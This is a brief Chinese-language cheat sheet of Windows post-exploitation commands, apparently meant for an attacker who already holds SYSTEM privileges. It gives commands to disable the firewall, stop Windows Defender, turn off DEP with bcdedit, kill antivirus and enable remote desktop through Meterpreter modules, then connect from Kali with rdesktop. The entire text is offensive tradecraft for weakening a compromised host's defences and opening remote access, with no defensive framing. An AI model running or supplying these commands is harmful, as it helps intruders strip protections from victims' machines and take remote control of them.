需要system权限
关闭防火墙命令:
netsh advfirewall set allprofiles state off
命令关闭Denfnder:
Net stop windefend
命令关闭DEP(数据执行保护):
bcdedit.exe /set {current} nx Alwaysoff
命令关闭杀毒软件:
在meterpreter下执行run post/windows/manage/killav
命令开启远程桌面:
在meterpreter下执行run post/windows/manage/enable_rdp
最后生成了一个文件,告知清除/关闭远程桌面的命令,查看该文件:
可以在meterpreter下使用该命令执行该文件的命令run multi_console_command -r [文件路径]
kali连接远程桌面命令
rdesktop [ip]